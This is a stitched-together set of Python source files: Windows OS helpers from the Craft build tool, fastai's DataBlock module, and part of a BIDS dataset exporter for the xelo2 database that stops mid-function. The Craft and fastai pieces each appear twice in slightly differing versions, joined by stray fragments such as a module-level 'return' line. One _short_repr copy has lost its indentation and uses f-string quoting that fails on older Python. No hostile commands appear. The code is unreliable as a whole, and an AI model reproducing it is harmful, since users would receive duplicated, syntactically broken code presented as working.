        """Clear FILE_ATTRIBUTE_READONLY on path, keeping all other attribute bits."""
        attributes = OsUtils.getFileAttributes(path)
        return ctypes.windll.kernel32.SetFileAttributesW(path,
                                                         attributes & ~ FileAttributes.FILE_ATTRIBUTE_READONLY) != 0

    @staticmethod
    def setConsoleTitle(title):
        """Set the console window title; returns True on success."""
        return ctypes.windll.kernel32.SetConsoleTitleW(title) != 0

    @staticmethod
    def supportsSymlinks():
        """Probe whether 'mklink' works in this environment (result cached by CraftCore)."""
        with tempfile.TemporaryDirectory() as tmp:
            testFile = os.path.join(tmp, "CRAFT_LINK_TEST")
            return CraftCore.cache.getCommandOutput(f"cmd", f"/C mklink {testFile} {__file__}", testName="CRAFT_LINK_TEST")[0] == 0

    @staticmethod
    def toNativePath(path : str) -> str:
        """On Windows the native path form is the backslash-separated Windows form."""
        return OsUtils.toWindowsPath(path)

    @staticmethod
    def enableAnsiColors():
        # tell Windows 10 that we do ansi
        # -11 = STD_OUTPUT_HANDLE; mode 7 presumably enables virtual terminal processing -- TODO confirm flag set
        ctypes.windll.kernel32.SetConsoleMode(ctypes.windll.kernel32.GetStdHandle(-11), 7)

    @staticmethod
    def killProcess(name : str="*", prefix : str=None) -> bool:
        """Stop every process whose executable path lies under prefix (default: the craft root)."""
        if not prefix:
            prefix = CraftCore.standardDirs.craftRoot()
        powershell = CraftCore.cache.findApplication("powershell")
        if not powershell:
            CraftCore.log.warning("Failed to detect powershell")
            return False
        # Fixed: the PowerShell command string had mismatched quotes (a Python syntax error);
        # restored the correct single-quoted '{name}' and '{prefix}*' wildcards.
        # NOTE(review): name/prefix are interpolated into a shell=True command string; callers
        # must only pass trusted values.
        out = subprocess.run(f"{powershell} -NoProfile -ExecutionPolicy ByPass -Command \"& {{" +
                             f"Get-Process '{name}' | Where-Object {{$_.Path -like '{prefix}*'}} | Stop-Process}}\"", shell=True, stderr=subprocess.STDOUT)
        CraftCore.log.debug(f"killProcess {out.args}: {out.stdout} {out.returncode}")
        return out.returncode == 0
return out.returncode == 0
| import tempfile
import ctypes
import os
import platform
import subprocess
import CraftOS.OsUtilsBase
from CraftCore import CraftCore
class FileAttributes():
    # Win32 file attribute flag constants.
    # https://msdn.microsoft.com/en-us/library/windows/desktop/gg258117(v=vs.85).aspx
    FILE_ATTRIBUTE_READONLY = 0x1  # file is read-only
    FILE_ATTRIBUTE_REPARSE_POINT = 0x400  # file/directory is a reparse point (junction, symlink, ...)
class OsUtils(CraftOS.OsUtilsBase.OsUtilsBase):
    # Windows implementation of Craft's OS utility helpers, built on Win32 calls via ctypes.

    @staticmethod
    def rm(path, force=False):
        # Delete a single file; returns True on success (DeleteFileW returns non-zero).
        CraftCore.log.debug("deleting file %s" % path)
        if force:
            # read-only files cannot be deleted, so strip the attribute first
            OsUtils.removeReadOnlyAttribute(path)
        return ctypes.windll.kernel32.DeleteFileW(path) != 0

    @staticmethod
    def rmDir(path, force=False):
        # Remove a directory; returns True on success (RemoveDirectoryW returns non-zero).
        CraftCore.log.debug("deleting directory %s" % path)
        if force:
            OsUtils.removeReadOnlyAttribute(path)
        return ctypes.windll.kernel32.RemoveDirectoryW(path) != 0

    @staticmethod
    def isLink(path):
        # Truthy when path is a symlink or carries the reparse-point attribute.
        # NOTE(review): bitwise '|' (not boolean 'or') -- both operands are always evaluated
        # and the result is an int that callers treat as truthy.
        return os.path.islink(path) \
            | OsUtils.getFileAttributes(path) & FileAttributes.FILE_ATTRIBUTE_REPARSE_POINT # Detect a Junction

    @staticmethod
    def getFileAttributes(path):
        # Raw Win32 attribute bitmask for path (GetFileAttributesW).
        return ctypes.windll.kernel32.GetFileAttributesW(path)

    @staticmethod
    def removeReadOnlyAttribute(path):
        # Clear FILE_ATTRIBUTE_READONLY on path, keeping all other attribute bits.
        attributes = OsUtils.getFileAttributes(path)
        return ctypes.windll.kernel32.SetFileAttributesW(path,
                                                         attributes & ~ FileAttributes.FILE_ATTRIBUTE_READONLY) != 0

    @staticmethod
    def setConsoleTitle(title):
        # Set the console window title; returns True on success.
        return ctypes.windll.kernel32.SetConsoleTitleW(title) != 0

    @staticmethod
    def supportsSymlinks():
        # Probe whether 'mklink' succeeds in this environment (result cached by CraftCore).
        with tempfile.TemporaryDirectory() as tmp:
            testFile = os.path.join(tmp, "CRAFT_LINK_TEST")
            return CraftCore.cache.getCommandOutput(f"cmd", f"/C mklink {testFile} {__file__}", testName="CRAFT_LINK_TEST")[0] == 0

    @staticmethod
    def toNativePath(path : str) -> str:
        # On Windows the native path form is the backslash-separated Windows form.
        return OsUtils.toWindowsPath(path)

    @staticmethod
    def enableAnsiColors():
        # tell Windows 10 that we do ansi
        # -11 = STD_OUTPUT_HANDLE; mode 7 presumably enables virtual terminal processing -- TODO confirm flag set
        ctypes.windll.kernel32.SetConsoleMode(ctypes.windll.kernel32.GetStdHandle(-11), 7)

    @staticmethod
    def killProcess(name : str="*", prefix : str=None) -> bool:
        # Stop every process whose executable path lies under prefix (default: the craft root).
        # NOTE(review): name/prefix are interpolated into a shell=True command string; callers
        # must only pass trusted values.
        if not prefix:
            prefix = CraftCore.standardDirs.craftRoot()
        powershell = CraftCore.cache.findApplication("powershell")
        if not powershell:
            CraftCore.log.warning("Failed to detect powershell")
            return False
        out = subprocess.run(f"{powershell} -NoProfile -ExecutionPolicy ByPass -Command \"& {{" +
                             f"Get-Process '{name}' | Where-Object {{$_.Path -like '{prefix}*'}} | Stop-Process}}\"", shell=True, stderr=subprocess.STDOUT)
        CraftCore.log.debug(f"killProcess {out.args}: {out.stdout} {out.returncode}")
        return out.returncode == 0
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/06_data.block.ipynb (unless otherwise specified).
__all__ = ['TransformBlock', 'CategoryBlock', 'MultiCategoryBlock', 'RegressionBlock', 'DataBlock']
# Cell
from ..torch_basics import *
from .core import *
from .load import *
from .external import *
from .transforms import *
# Cell
class TransformBlock():
    "A basic wrapper that links defaults transforms for the data block API"
    def __init__(self, type_tfms=None, item_tfms=None, batch_tfms=None, dl_type=None, dls_kwargs=None):
        # Every tfm argument is normalised to an `L`; `ToTensor` always leads the item tfms.
        self.type_tfms = L(type_tfms)
        self.item_tfms = ToTensor + L(item_tfms)
        self.batch_tfms = L(batch_tfms)
        self.dl_type = dl_type
        self.dls_kwargs = dls_kwargs if dls_kwargs is not None else {}
# Cell
def CategoryBlock(vocab=None, add_na=False):
    "`TransformBlock` for single-label categorical targets"
    cat = Categorize(vocab=vocab, add_na=add_na)
    return TransformBlock(type_tfms=cat)
# Cell
def MultiCategoryBlock(encoded=False, vocab=None, add_na=False):
    "`TransformBlock` for multi-label categorical targets"
    if encoded:
        tfm = EncodedMultiCategorize(vocab=vocab)
    else:
        tfm = [MultiCategorize(vocab=vocab, add_na=add_na), OneHotEncode]
    return TransformBlock(type_tfms=tfm)
# Cell
def RegressionBlock(c_out=None):
    "`TransformBlock` for float targets"
    setup = RegressionSetup(c_out)
    return TransformBlock(type_tfms=setup)
# Cell
from inspect import isfunction,ismethod
# Cell
def _merge_tfms(*tfms):
    "Group the `tfms` in a single list, removing duplicates (from the same class) and instantiating"
    def _key(o):
        # classes group by themselves, plain functions by qualname, instances by class
        if isinstance(o, type): return o
        if isfunction(o) or ismethod(o): return o.__qualname__
        return o.__class__
    g = groupby(concat(*tfms), _key)
    return L(v[-1] for k, v in g.items()).map(instantiate)
def _zip(x):
    "Transpose the collection-of-collections `x` via `L.zip`."
    return L(x).zip()
# Cell
@docs
@funcs_kwargs
class DataBlock():
    "Generic container to quickly build `Datasets` and `DataLoaders`"
    # Overridable hooks; `funcs_kwargs` also accepts them as constructor kwargs (see `_methods`)
    get_x=get_items=splitter=get_y = None
    blocks,dl_type = (TransformBlock,TransformBlock),TfmdDL
    _methods = 'get_items splitter get_y get_x'.split()
    def __init__(self, blocks=None, dl_type=None, getters=None, n_inp=None, item_tfms=None, batch_tfms=None, **kwargs):
        # Instantiate the blocks and collect their transforms and dataloader settings
        blocks = L(self.blocks if blocks is None else blocks)
        blocks = L(b() if callable(b) else b for b in blocks)
        self.type_tfms = blocks.attrgot('type_tfms', L())
        self.default_item_tfms = _merge_tfms(*blocks.attrgot('item_tfms', L()))
        self.default_batch_tfms = _merge_tfms(*blocks.attrgot('batch_tfms', L()))
        for t in blocks: self.dl_type = getattr(t, 'dl_type', self.dl_type)
        self.dataloaders = delegates(self.dl_type.__init__)(self.dataloaders)
        self.dls_kwargs = merge(*blocks.attrgot('dls_kwargs', {}))
        # One getter per block; get_x/get_y override the first/second position
        self.getters = [noop] * len(self.type_tfms) if getters is None else getters
        if self.get_x: self.getters[0] = self.get_x
        if self.get_y: self.getters[1] = self.get_y
        self.n_inp = n_inp
        # fix: the f-string reused the outer quote inside the replacement field,
        # a SyntaxError on every Python before 3.12
        if kwargs: raise TypeError(f'invalid keyword arguments: {", ".join(kwargs.keys())}')
        self.new(item_tfms, batch_tfms)
    def _combine_type_tfms(self): return L([self.getters, self.type_tfms]).map_zip(lambda g,tt: L(g) + tt)
    def new(self, item_tfms=None, batch_tfms=None):
        self.item_tfms = _merge_tfms(self.default_item_tfms, item_tfms)
        self.batch_tfms = _merge_tfms(self.default_batch_tfms, batch_tfms)
        return self
    @classmethod
    def from_columns(cls, blocks=None, getters=None, get_items=None, **kwargs):
        # Alternate constructor: getters index into the columns of zipped items
        if getters is None: getters = L(itemgetter(i) for i in range(2 if blocks is None else len(L(blocks))))
        get_items = _zip if get_items is None else compose(get_items, _zip)
        return cls(blocks=blocks, getters=getters, get_items=get_items, **kwargs)
    def datasets(self, source, verbose=False):
        self.source = source ; pv(f"Collecting items from {source}", verbose)
        items = (self.get_items or noop)(source) ; pv(f"Found {len(items)} items", verbose)
        splits = (self.splitter or RandomSplitter())(items)
        # fix: same quote-reuse SyntaxError as in __init__
        pv(f"{len(splits)} datasets of sizes {','.join([str(len(s)) for s in splits])}", verbose)
        return Datasets(items, tfms=self._combine_type_tfms(), splits=splits, dl_type=self.dl_type, n_inp=self.n_inp, verbose=verbose)
    def dataloaders(self, source, path='.', verbose=False, **kwargs):
        dsets = self.datasets(source)
        kwargs = {**self.dls_kwargs, **kwargs, 'verbose': verbose}
        return dsets.dataloaders(path=path, after_item=self.item_tfms, after_batch=self.batch_tfms, **kwargs)
    _docs = dict(new="Create a new `DataBlock` with other `item_tfms` and `batch_tfms`",
                 datasets="Create a `Datasets` object from `source`",
                 dataloaders="Create a `DataLoaders` object from `source`")
# Cell
def _short_repr(x):
if isinstance(x, tuple): return f'({', '.join([_short_repr(y) for y in x])})'
if isinstance(x, list): return f'[{', '.join([_short_repr(y) for y in x])}]'
if not isinstance(x, Tensor): return str(x)
if x.numel() <= 20 and x.ndim <=1: return str(x)
return f'{x.__class__.__name__} of size {'x'.join([str(d) for d in x.shape])}'
# Cell
def _apply_pipeline(p, x):
    "Run pipeline `p` on `x` transform by transform, narrating every step."
    print(f" {p}\n starting from\n {_short_repr(x)}")
    for tfm in p.fs:
        name = tfm.name
        try:
            x = tfm(x)
            # noop transforms are skipped in the narration
            if name != "noop": print(f" applying {name} gives\n {_short_repr(x)}")
        except Exception as e:
            print(f" applying {name} failed.")
            raise e
    return x
# Cell
from .load import _collate_types
def _find_fail_collate(s):
    "Explain why the samples `s` cannot be collated into a batch, or return None if they can."
    s = L(*s)
    # every element of the first sample must be a collatable type
    for x in s[0]:
        if not isinstance(x, _collate_types): return f"{type(x).__name__} is not collatable"
    # collate each tuple position on its own to pinpoint the failing member
    for i in range_of(s[0]):
        try: _ = default_collate(s.itemgot(i))
        except:
            shapes = [getattr(o[i], 'shape', None) for o in s]
            # fix: the join string reused the outer f-string quote - SyntaxError before 3.12
            return f"Could not collate the {i}-th members of your tuples because got the following shapes\n{','.join([str(s) for s in shapes])}"
# Cell
@patch
def summary(self: DataBlock, source, bs=4, **kwargs):
    """Walk the whole data pipeline on `source`, printing every intermediate step.

    Builds the `Datasets`, one sample, `bs` samples, and finally one batch,
    narrating each transform so failures can be located. Debugging aid only.
    """
    print(f"Setting-up type transforms pipelines")
    dsets = self.datasets(source, verbose=True)
    print("\nBuilding one sample")
    # apply each type-transform pipeline to the first training item
    for tl in dsets.train.tls: _apply_pipeline(tl.tfms, dsets.train.items[0])
    print(f"\nFinal sample: {dsets.train[0]}\n\n")
    dls = self.dataloaders(source, verbose=True)
    print("\nBuilding one batch")
    if len([f for f in dls.train.after_item.fs if f.name != 'noop'])!=0:
        print("Applying item_tfms to the first sample:")
        s = [_apply_pipeline(dls.train.after_item, dsets.train[0])]
        print(f"\nAdding the next {bs-1} samples")
        s += [dls.train.after_item(dsets.train[i]) for i in range(1, bs)]
    else:
        print("No item_tfms to apply")
        s = [dls.train.after_item(dsets.train[i]) for i in range(bs)]
    if len([f for f in dls.train.before_batch.fs if f.name != 'noop'])!=0:
        print("\nApplying before_batch to the list of samples")
        s = _apply_pipeline(dls.train.before_batch, s)
    else: print("\nNo before_batch transform to apply")
    print("\nCollating items in a batch")
    try:
        b = dls.train.create_batch(s)
        b = retain_types(b, s[0] if is_listy(s) else s)
    except Exception as e:
        print("Error! It's not possible to collate your items in a batch")
        # explain which tuple member failed to collate before re-raising
        why = _find_fail_collate(s)
        print("Make sure all parts of your samples are tensors of the same size" if why is None else why)
        raise e
    if len([f for f in dls.train.after_batch.fs if f.name != 'noop'])!=0:
        print("\nApplying batch_tfms to the batch built")
        b = _apply_pipeline(dls.train.after_batch, b)
    else: print("\nNo batch_tfms to apply")
__all__ = ['TransformBlock', 'CategoryBlock', 'MultiCategoryBlock', 'RegressionBlock', 'DataBlock']
# Cell
from ..torch_basics import *
from .core import *
from .load import *
from .external import *
from .transforms import *
# Cell
class TransformBlock():
    "A basic wrapper that links defaults transforms for the data block API"
    def __init__(self, type_tfms=None, item_tfms=None, batch_tfms=None, dl_type=None, dls_kwargs=None):
        # Every tfm argument is normalised to an `L`; `ToTensor` always leads the item tfms.
        self.type_tfms = L(type_tfms)
        self.item_tfms = ToTensor + L(item_tfms)
        self.batch_tfms = L(batch_tfms)
        self.dl_type = dl_type
        self.dls_kwargs = dls_kwargs if dls_kwargs is not None else {}
# Cell
def CategoryBlock(vocab=None, add_na=False):
    "`TransformBlock` for single-label categorical targets"
    cat = Categorize(vocab=vocab, add_na=add_na)
    return TransformBlock(type_tfms=cat)
# Cell
def MultiCategoryBlock(encoded=False, vocab=None, add_na=False):
    "`TransformBlock` for multi-label categorical targets"
    if encoded:
        tfm = EncodedMultiCategorize(vocab=vocab)
    else:
        tfm = [MultiCategorize(vocab=vocab, add_na=add_na), OneHotEncode]
    return TransformBlock(type_tfms=tfm)
# Cell
def RegressionBlock(c_out=None):
    "`TransformBlock` for float targets"
    setup = RegressionSetup(c_out)
    return TransformBlock(type_tfms=setup)
# Cell
from inspect import isfunction,ismethod
# Cell
def _merge_tfms(*tfms):
    "Group the `tfms` in a single list, removing duplicates (from the same class) and instantiating"
    def _key(o):
        # classes group by themselves, plain functions by qualname, instances by class
        if isinstance(o, type): return o
        if isfunction(o) or ismethod(o): return o.__qualname__
        return o.__class__
    g = groupby(concat(*tfms), _key)
    return L(v[-1] for k, v in g.items()).map(instantiate)
def _zip(x):
    "Transpose the collection-of-collections `x` via `L.zip`."
    return L(x).zip()
# Cell
@docs
@funcs_kwargs
class DataBlock():
    "Generic container to quickly build `Datasets` and `DataLoaders`"
    # Overridable hooks; `funcs_kwargs` also accepts them as constructor kwargs (see `_methods`)
    get_x=get_items=splitter=get_y = None
    blocks,dl_type = (TransformBlock,TransformBlock),TfmdDL
    _methods = 'get_items splitter get_y get_x'.split()
    def __init__(self, blocks=None, dl_type=None, getters=None, n_inp=None, item_tfms=None, batch_tfms=None, **kwargs):
        # Instantiate the blocks and collect their transforms and dataloader settings
        blocks = L(self.blocks if blocks is None else blocks)
        blocks = L(b() if callable(b) else b for b in blocks)
        self.type_tfms = blocks.attrgot('type_tfms', L())
        self.default_item_tfms = _merge_tfms(*blocks.attrgot('item_tfms', L()))
        self.default_batch_tfms = _merge_tfms(*blocks.attrgot('batch_tfms', L()))
        # The last block providing a `dl_type` wins.
        # NOTE(review): the `dl_type` *argument* appears unused in this body - confirm.
        for t in blocks: self.dl_type = getattr(t, 'dl_type', self.dl_type)
        self.dataloaders = delegates(self.dl_type.__init__)(self.dataloaders)
        self.dls_kwargs = merge(*blocks.attrgot('dls_kwargs', {}))
        # One getter per block; get_x/get_y override the first/second position
        self.getters = [noop] * len(self.type_tfms) if getters is None else getters
        if self.get_x: self.getters[0] = self.get_x
        if self.get_y: self.getters[1] = self.get_y
        self.n_inp = n_inp
        if kwargs: raise TypeError(f'invalid keyword arguments: {", ".join(kwargs.keys())}')
        self.new(item_tfms, batch_tfms)
    def _combine_type_tfms(self): return L([self.getters, self.type_tfms]).map_zip(lambda g,tt: L(g) + tt)
    def new(self, item_tfms=None, batch_tfms=None):
        self.item_tfms = _merge_tfms(self.default_item_tfms, item_tfms)
        self.batch_tfms = _merge_tfms(self.default_batch_tfms, batch_tfms)
        return self
    @classmethod
    def from_columns(cls, blocks=None, getters=None, get_items=None, **kwargs):
        # Alternate constructor: getters index into the columns of zipped items
        if getters is None: getters = L(itemgetter(i) for i in range(2 if blocks is None else len(L(blocks))))
        get_items = _zip if get_items is None else compose(get_items, _zip)
        return cls(blocks=blocks, getters=getters, get_items=get_items, **kwargs)
    def datasets(self, source, verbose=False):
        self.source = source ; pv(f"Collecting items from {source}", verbose)
        items = (self.get_items or noop)(source) ; pv(f"Found {len(items)} items", verbose)
        splits = (self.splitter or RandomSplitter())(items)
        pv(f"{len(splits)} datasets of sizes {','.join([str(len(s)) for s in splits])}", verbose)
        return Datasets(items, tfms=self._combine_type_tfms(), splits=splits, dl_type=self.dl_type, n_inp=self.n_inp, verbose=verbose)
    def dataloaders(self, source, path='.', verbose=False, **kwargs):
        dsets = self.datasets(source)
        kwargs = {**self.dls_kwargs, **kwargs, 'verbose': verbose}
        return dsets.dataloaders(path=path, after_item=self.item_tfms, after_batch=self.batch_tfms, **kwargs)
    _docs = dict(new="Create a new `DataBlock` with other `item_tfms` and `batch_tfms`",
                 datasets="Create a `Datasets` object from `source`",
                 dataloaders="Create a `DataLoaders` object from `source`")
# Cell
def _short_repr(x):
if isinstance(x, tuple): return f'({", ".join([_short_repr(y) for y in x])})'
if isinstance(x, list): return f'[{", ".join([_short_repr(y) for y in x])}]'
if not isinstance(x, Tensor): return str(x)
if x.numel() <= 20 and x.ndim <=1: return str(x)
return f'{x.__class__.__name__} of size {"x".join([str(d) for d in x.shape])}'
# Cell
def _apply_pipeline(p, x):
    "Run pipeline `p` on `x` transform by transform, narrating every step."
    print(f" {p}\n starting from\n {_short_repr(x)}")
    for tfm in p.fs:
        name = tfm.name
        try:
            x = tfm(x)
            # noop transforms are skipped in the narration
            if name != "noop": print(f" applying {name} gives\n {_short_repr(x)}")
        except Exception as e:
            print(f" applying {name} failed.")
            raise e
    return x
# Cell
from .load import _collate_types
def _find_fail_collate(s):
    "Return a message explaining why samples `s` don't collate, or None if they do."
    s = L(*s)
    # every element of the first sample must be a collatable type
    for x in s[0]:
        if not isinstance(x, _collate_types):
            return f"{type(x).__name__} is not collatable"
    # collate each tuple position on its own to pinpoint the failing member
    for i in range_of(s[0]):
        try:
            _ = default_collate(s.itemgot(i))
        except:
            shapes = [getattr(o[i], 'shape', None) for o in s]
            return f"Could not collate the {i}-th members of your tuples because got the following shapes\n{','.join([str(s) for s in shapes])}"
# Cell
@patch
def summary(self: DataBlock, source, bs=4, **kwargs):
    """Walk the whole data pipeline on `source`, printing every intermediate step.

    Builds the `Datasets`, one sample, `bs` samples, and finally one batch,
    narrating each transform so failures can be located. Debugging aid only.
    """
    print(f"Setting-up type transforms pipelines")
    dsets = self.datasets(source, verbose=True)
    print("\nBuilding one sample")
    # apply each type-transform pipeline to the first training item
    for tl in dsets.train.tls: _apply_pipeline(tl.tfms, dsets.train.items[0])
    print(f"\nFinal sample: {dsets.train[0]}\n\n")
    dls = self.dataloaders(source, verbose=True)
    print("\nBuilding one batch")
    if len([f for f in dls.train.after_item.fs if f.name != 'noop'])!=0:
        print("Applying item_tfms to the first sample:")
        s = [_apply_pipeline(dls.train.after_item, dsets.train[0])]
        print(f"\nAdding the next {bs-1} samples")
        s += [dls.train.after_item(dsets.train[i]) for i in range(1, bs)]
    else:
        print("No item_tfms to apply")
        s = [dls.train.after_item(dsets.train[i]) for i in range(bs)]
    if len([f for f in dls.train.before_batch.fs if f.name != 'noop'])!=0:
        print("\nApplying before_batch to the list of samples")
        s = _apply_pipeline(dls.train.before_batch, s)
    else: print("\nNo before_batch transform to apply")
    print("\nCollating items in a batch")
    try:
        b = dls.train.create_batch(s)
        b = retain_types(b, s[0] if is_listy(s) else s)
    except Exception as e:
        print("Error! It's not possible to collate your items in a batch")
        # explain which tuple member failed to collate before re-raising
        why = _find_fail_collate(s)
        print("Make sure all parts of your samples are tensors of the same size" if why is None else why)
        raise e
    if len([f for f in dls.train.after_batch.fs if f.name != 'noop'])!=0:
        print("\nApplying batch_tfms to the batch built")
        b = _apply_pipeline(dls.train.after_batch, b)
    else: print("\nNo batch_tfms to apply")
from json import dump, load
from pathlib import Path
from copy import copy as c
from collections import defaultdict
from logging import getLogger
from datetime import date, datetime
from shutil import copy, rmtree
from bidso.utils import replace_extension
from PyQt5.QtSql import QSqlQuery
from ..api import list_subjects, Run
from .mri import convert_mri
from .ephys import convert_ephys
from .physio import convert_physio
from .events import convert_events
from .utils import rename_task, prepare_subset, add_extra_fields_to_json
from .templates import (
JSON_PARTICIPANTS,
JSON_SESSIONS,
)
# protocols
PROTOCOL_HEALTHY = [
'16-816',
]
lg = getLogger(__name__)
def create_bids(db, data_path, deface=True, subset=None, keep_phase=False):
    """Export (a subset of) the xelo2 database `db` as a BIDS tree at `data_path`.

    Any existing `data_path` is removed first. `subset` restricts the export to the
    listed subjects/sessions/runs (extended with their IntendedFor targets),
    `deface` is forwarded to the MRI conversion, and `keep_phase` keeps the
    *_phase.nii.gz images that are otherwise deleted.
    """
    if subset is not None:
        subset = add_intended_for(db, subset)
        subset_subj = set(subset['subjects'])
        subset_sess = set(subset['sessions'])
        subset_run = set(subset['runs'])
    data_path = Path(data_path)
    if data_path.exists():
        rmtree(data_path, ignore_errors=True)
    data_path.mkdir(parents=True, exist_ok=True)
    # the dataset_description.json is used by find_root, in some subscripts
    _make_dataset_description(data_path)
    intendedfor = {}
    scans_json = {}
    participants = []
    for subj in list_subjects(db):
        bids_name = {
            'sub': None,
            'ses': None,
            'task': None,
            'acq': None,
            'rec': None,
            'dir': None,
            'run': None,
            'recording': None,  # only for physiology
            }
        if subset is not None and subj.id not in subset_subj:
            continue
        # use relative date based on date_of_signature
        reference_dates = [p.date_of_signature for p in subj.list_protocols()]
        reference_dates = [date for date in reference_dates if date is not None]
        if len(reference_dates) == 0:
            lg.warning(f'You need to add at least one research protocol with dates for {subj.codes}')
            lg.info('Using date of the first task performed by the subject')
            reference_dates = [x.start_time for x in subj.list_sessions() if x.start_time is not None]
            if len(reference_dates):
                reference_date = min(reference_dates).date()
            else:
                # NOTE(review): this fallback is a datetime while the other branches
                # yield a date; subtracting date_of_birth below would then raise - confirm
                reference_date = datetime(2000, 1, 1, 12, 0, 0)  # if no task has dates, then use a random date
        else:
            reference_date = max(reference_dates)
        lg.info(f'Adding {subj.codes}')
        codes = subj.codes
        if len(codes) == 0:
            # use id if code is empty (fix: the f-prefix was missing, so the
            # literal text "id{subj.id}" became the subject code)
            code = f'id{subj.id}'
        else:
            code = codes[0]
        bids_name['sub'] = 'sub-' + code
        subj_path = data_path / bids_name['sub']
        subj_path.mkdir(parents=True, exist_ok=True)
        if subj.date_of_birth is None:
            lg.warning(f'You need to add date_of_birth to {subj.codes}')
            age = 'n/a'
        else:
            age = (reference_date - subj.date_of_birth).days // 365.2425
            age = f'{age:.0f}'
        patient_or_healthy = 'patient'
        for p in subj.list_protocols():
            if p.metc in PROTOCOL_HEALTHY:
                patient_or_healthy = 'healthy'
        participants.append({
            'participant_id': bids_name['sub'],
            'sex': subj.sex,
            'age': age,
            'group': patient_or_healthy,
            })
        sess_count = defaultdict(int)
        sess_files = []
        for sess in subj.list_sessions():
            sess_count[_make_sess_name(sess)] += 1  # also count the sessions which are not included
            if subset is not None and sess.id not in subset_sess:
                continue
            bids_name['ses'] = f'ses-{_make_sess_name(sess)}{sess_count[_make_sess_name(sess)]}'
            sess_path = subj_path / bids_name['ses']
            sess_path.mkdir(parents=True, exist_ok=True)
            lg.info(f'Adding {bids_name["sub"]} / {bids_name["ses"]}')
            sess_files.append({
                'session_id': bids_name['ses'],
                'resection': 'n/a',
                'implantation': 'no',
                })
            if sess.name in ('IEMU', 'OR', 'CT'):
                sess_files[-1]['implantation'] = 'yes'
            run_count = defaultdict(int)
            run_files = []
            for run in sess.list_runs():
                run_count[run.task_name] += 1  # also count the runs which are not included
                if subset is not None and run.id not in subset_run:
                    continue
                if len(run.list_recordings()) == 0:
                    lg.warning(f'No recordings for {subj.codes}/{run.task_name}')
                    continue
                acquisition = get_bids_acquisition(run)
                bids_name['run'] = f'run-{run_count[run.task_name]}'
                if acquisition in ('ieeg', 'eeg', 'meg', 'func'):
                    bids_name['task'] = f'task-{rename_task(run.task_name)}'
                else:
                    bids_name['task'] = None
                mod_path = sess_path / acquisition
                mod_path.mkdir(parents=True, exist_ok=True)
                lg.info(f'Adding {bids_name["sub"]} / {bids_name["ses"]} / {acquisition} / {bids_name["task"]} ({run})')
                data_name = None
                for rec in run.list_recordings():
                    # dir can only go with bold and epi modality
                    if rec.modality in ('bold', 'epi') and rec.PhaseEncodingDirection is not None:
                        bids_name['dir'] = 'dir-' + rec.PhaseEncodingDirection
                    else:
                        bids_name['dir'] = None
                    if rec.modality in ('bold', 'T1w', 'T2w', 'T2star', 'PD', 'FLAIR', 'angio', 'epi'):
                        data_name = convert_mri(run, rec, mod_path, c(bids_name), deface)
                    elif rec.modality in ('ieeg', 'eeg', 'meg'):
                        if run.duration is None:
                            lg.warning(f'You need to specify duration for {subj.codes}/{run}')
                            continue
                        data_name = convert_ephys(run, rec, mod_path, c(bids_name), intendedfor)
                    elif rec.modality == 'physio':
                        if data_name is None:
                            lg.warning('physio only works after another recording modality')
                        elif acquisition == 'fmap':
                            lg.info('physio was recorded but BIDS says that it should not be included in fmap')
                        else:
                            convert_physio(rec, mod_path, c(bids_name))
                    else:
                        lg.warning(f'Unknown modality {rec.modality} for {rec}')
                        continue
                    if data_name is not None and acquisition in ('ieeg', 'eeg', 'meg', 'func'):
                        convert_events(run, mod_path, c(bids_name))
                    if data_name is not None and rec.modality != 'physio':  # secondary modality
                        intendedfor[run.id] = data_name
                        fields = {
                            'filename': data_name,
                            'acq_time': _set_date_to_1900(reference_date, run.start_time).isoformat(timespec='seconds'),
                            }
                        run_files.append(add_extra_fields_to_json(run, fields, scans_json))
            if len(run_files) == 0:
                continue
            tsv_file = sess_path / f'{bids_name["sub"]}_{bids_name["ses"]}_scans.tsv'
            if run_files:
                _list_scans(tsv_file, c(run_files), sess_path)
        tsv_file = subj_path / f'{bids_name["sub"]}_sessions.tsv'
        if sess_files:
            _list_scans(tsv_file, sess_files, data_path)
            json_sessions = tsv_file.with_suffix('.json')
            copy(JSON_SESSIONS, json_sessions)  # https://github.com/bids-standard/bids-validator/issues/888
    # add IntendedFor for top_up scans
    _add_intendedfor(db, data_path, intendedfor)
    # remove phase because we get lots of warnings from BIDS
    if not keep_phase:
        remove_phase(data_path)
    # here the rest
    if len(scans_json) > 0:
        with (data_path / 'scans.json').open('w') as f:
            dump(scans_json, f, ensure_ascii=False, indent=' ')
    _make_README(data_path)
    tsv_file = data_path / 'participants.tsv'
    _list_scans(tsv_file, participants, data_path)
    json_participants = tsv_file.with_suffix('.json')
    copy(JSON_PARTICIPANTS, json_participants)
    _make_bids_config(data_path)
def _list_scans(tsv_file, scans, root_dir):
    """Write `scans` (a list of dicts) as a tab-separated table at `tsv_file`.

    Missing keys are filled with 'n/a'. A 'filename' column is rewritten relative
    to `root_dir` (mutating the dicts in place, as before).
    """
    if 'filename' in scans[0]:
        for scan in scans:
            scan['filename'] = str(scan['filename'].relative_to(root_dir))
    cols = _find_columns(scans)
    with tsv_file.open('w') as f:
        f.write('\t'.join(cols) + '\n')
        for scan in scans:
            f.write('\t'.join(scan.get(k, 'n/a') for k in cols) + '\n')
def _make_dataset_description(data_path):
"""Generate general description of the dataset
Parameters
----------
data_path : Path
root BIDS directory
"""
d = {
"Name": data_path.name,
"BIDSVersion": "1.2.1",
"License": "CC0",
"Authors": [
"Giovanni Piantoni",
"Nick Ramsey",
],
"Acknowledgements": "",
"HowToAcknowledge": '',
"Funding": [
],
"ReferencesAndLinks": ["", ],
"DatasetDOI": ""
}
with (data_path / 'dataset_description.json').open('w') as f:
dump(d, f, ensure_ascii=False, indent=' ')
def get_bids_acquisition(run):
    """Map the first recognized recording modality of `run` onto its BIDS folder name.

    Raises ValueError when no recording has a known modality.
    """
    anat_modalities = ('T1w', 'T2w', 'T2star', 'FLAIR', 'PD', 'angio')
    for recording in run.list_recordings():
        modality = recording.modality
        if modality in ('ieeg', 'eeg', 'meg'):
            return modality
        if modality in anat_modalities:
            return 'anat'
        if modality in ('bold', 'phase'):
            return 'func'
        if modality == 'epi':
            return 'fmap'
        if modality == 'ct':
            return 'ct'
    raise ValueError(f'I cannot determine BIDS folder for {repr(run)}')
def add_intended_for(db, subset):
    """Extend `subset` with the runs referenced by IntendedFor links (T1w refs and topups)."""
    referenced = add_intended_for_elec(db, subset) + add_intended_for_topup(db, subset)
    if not referenced:
        return subset
    run_id_sql = '`runs`.`id` in ({})'.format(', '.join(str(x) for x in referenced))
